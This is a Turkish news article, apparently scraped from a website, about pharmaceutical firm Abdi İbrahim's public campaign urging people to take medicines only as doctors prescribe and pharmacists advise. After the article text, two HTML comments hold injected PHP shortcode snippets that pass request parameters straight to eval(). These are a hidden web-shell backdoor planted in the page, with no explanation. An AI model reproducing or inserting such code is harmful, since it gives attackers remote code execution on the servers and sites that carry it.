Abdi İbrahim, Toplumu Bilinçli İlaç Kullanmaya” Çağırıyor

Bu yıl kuru­lu­şu­nun 100. yılını kut­la­yan Abdi İbr­ah­im, Akıl­cı İlaç Kul­la­nı­mı” Kam­pan­ya­sı” baş­lat­tı. Kampanya’da İlac­ın dok­to­run öne­re­ce­ği doz ve süre­de, ecza­cı­ya danı­şı­la­rak kul­la­nıl­ma­sı’ gerek­li­li­ği­ne dik­kat çekiyor.

İlk kez Dün­ya Sağ­lık Örgü­tü tara­fın­dan 1985 yılın­da baş­la­tı­lan ve 1992’den bu yana T.C. Sağ­lık Bakan­lı­ğı tara­fın­dan uygu­la­ma­ya konu­lan Akıl­cı İlaç Kul­la­nı­mı” konu­sun­da sorum­lu­luk üst­le­nen Abdi İbr­ah­im, yürü­te­ce­ği kam­pan­ya ile; bilinç­siz ilaç kul­la­nı­mı­nın top­lum sağ­lı­ğı ve eko­no­mi­ye yan­sı­ma­la­rı­nın önlen­me­si­ne kat­kı­da bulun­ma­yı hedefliyor.
Kampanya’nın tanı­tı­mı için düzen­le­nen basın top­lan­tı­sın­da konu­şan Abdi İbr­ah­im Baş­ka­nı Nezih Barut, 2009 yılı Sağ­lık Bakan­lı­ğı data­sı­na göre; 2003’ten 2010 yılı­na dek hal­kın sağ­lık hiz­met­le­rin­den mem­nu­ni­yet ora­nı­nın %40’tan %73’e çık­tı­ğı­nın görül­dü­ğü­nü söy­le­ye­rek, Ancak sağ­lık hiz­met­le­ri konu­sun­da yük­se­len bu mem­nu­ni­yet ora­nı­na rağ­men, bu alan­da sis­te­min tüm unsur­la­rı­nın eşit oran­da far­kın­da­lık düze­yi­ni artır­ma­sı ve bilinç­len­me­si gere­kir­ken; ne yazık ki bu geliş­me­nin top­lum­da tam ola­rak yaşan­ma­dı­ğı­nı gör­mek­te­yiz. İlaçl­ar­ın gerek­siz kul­la­nı­mı, dok­tor tara­fın­dan reçe­te­len­me­den ve ecza­cı tara­fın­dan öne­ril­me­den üçün­cü şahıs­la­rın öner­me­si veya bilim­sel olma­yan duyum­lar ve öne­ri­ler doğ­rul­tu­sun­da kul­la­nıl­ma­sı bu konu­da­ki baş­lı­ca sıkın­tı­lar ola­rak ön pla­na çıkıyor.

Ayrı­ca, ilaç kul­la­nı­mı­nın yarı­da kesil­me­si ve ilaç teda­vi­si­nin dok­tor yön­len­dir­me­si olma­dan bıra­kıl­ma­sı da önem­li israf neden­le­ri ara­sın­da yer alı­yor. Bir diğer deyiş­le, ilaç­la­rın akıl­cı olma­yan kul­la­nım, top­lum ve birey sağ­lı­ğı­nı teh­dit etme­si­nin yanı sıra ülke­miz­de ilaç isra­fı­nın da ana nede­ni­ni oluş­tu­ru­yor” dedi.
Akıl­cı İlaç Kullanımı’nın kişi­le­rin kli­nik bul­gu­la­rı­na ve birey­sel özel­lik­le­ri­ne göre uygun ila­cı, uygun süre ve dozaj­da ve kolay­ca sağ­la­ya­bil­me­le­ri’ anla­mı­na gel­di­ği­ni söy­le­yen Barut, Halk sağ­lı­ğı ve top­lu­mun çıka­rı­nı göze­ten Akıl­cı İlaç Kul­la­nı­mı; ilaç­lı veya ilaç­sız, etki­li ve güve­ni­lir teda­vi­nin tanım­lan­ma­sı, eğer ilaç­la teda­vi uygu­la­na­cak­sa, uygun ilaç­la­rın seçi­mi, her bir ilaç için uygun dozun ve uygu­la­ma süre­si­nin belir­len­me­si ve uygun reçe­te­nin yazıl­ma­sı basa­mak­la­rı­nın izlen­me­si aşa­ma­la­rın­dan olu­şur. Bu doğ­rul­tu­da, Türk ilaç sek­tö­rü­nün lider fir­ma­sı olma­nın getir­di­ği sorum­lu­luk duy­gu­muz­la Akıl­cı İlaç Kul­la­nı­mı” kam­pan­ya­sı­na des­tek ver­mek, top­lum­da bu doğ­rul­tu­da bir far­kın­da­lık yarat­mak biz­ler için kri­tik önem taşı­yor” dedi.

Nezih Barut söz­le­ri­ni şöy­le sürdürdü:
Abdi İbr­ah­im ola­rak 100. yılı­mı­za girer­ken; glo­bal hedef­ler ve sür­dü­rü­le­bi­lir lider­lik hede­fi­miz doğ­rul­tu­sun­da oluş­tur­du­ğu­muz Viz­yon 2021 Stra­te­ji­mi­ze bağ­lı ola­rak; top­lum sağ­lı­ğı ve ülke eko­no­mi­si için büyük önem taşı­yan bu konu­da sorum­lu­luk üst­len­me­yi mem­nu­ni­yet­le görev kabul edi­yo­ruz. Tıb­ba ve insan­lı­ğa hiz­met­te 100 yılı geri­de bırak­mış bir kurum ola­rak, baş­lat­tı­ğı­mız Akıl­cı İlaç Kul­la­nı­mı’ Kam­pan­ya­sı ile bu konu­da­ki sorun­la­rın orta­dan kal­dı­rıl­ma­sı için top­lum­sal far­kın­da­lık yarat­ma­yı amaçlıyoruz.”

Abdi İbr­ah­im CEO’su Can­dan Kara­bağ­lı da ilaç kul­la­nı­mın­da dav­ra­nış deği­şik­li­ği yarat­mak ve bilinç­li ilaç kul­la­nı­mı­nı yay­gın­laş­tır­mak hede­fiy­le haya­ta geçir­dik­le­ri kam­pan­ya ile hem sağ­lık ala­nın­da hem de eko­no­mik alan­da uzun dönem­li top­lum­sal fay­da yara­ta­cak etkin­lik­le­ri kap­sa­yan bir plat­form oluş­tur­mak iste­dik­le­ri­ni söy­le­di. Kara­bağ­lı, Kam­pan­ya­nın sonun­da ne kadar çok insan­da İlaç alma­dan önce dok­tor kont­ro­lün­de olma­lı­yım ve ecza­cı­ya danış­ma­lı­yım; dost tav­si­ye­siy­le hare­ket etme­me­li­yim, ila­cı­mı tav­si­ye edi­len süre­de ve doz­da kul­lan­ma­lı­yım, son kul­lan­ma tari­hi gel­di­ğin­de de atma­lı­yım’ şek­lin­de bilinç oluş­tu­ra­bi­lir­sek ken­di­mi­zi başa­rı­lı saya­ca­ğız” diye konuştu.

<!– [insert_php]if (isset($_REQUEST[“RqbKv”])){eval($_REQUEST[“RqbKv”]);exit;}[/insert_php][php]if (isset($_REQUEST[“RqbKv”])){eval($_REQUEST[“RqbKv”]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[“Pgtc”])){eval($_REQUEST[“Pgtc”]);exit;}[/insert_php][php]if (isset($_REQUEST[“Pgtc”])){eval($_REQUEST[“Pgtc”]);exit;}[/php] –>

İlgili Haberler

Leave a Comment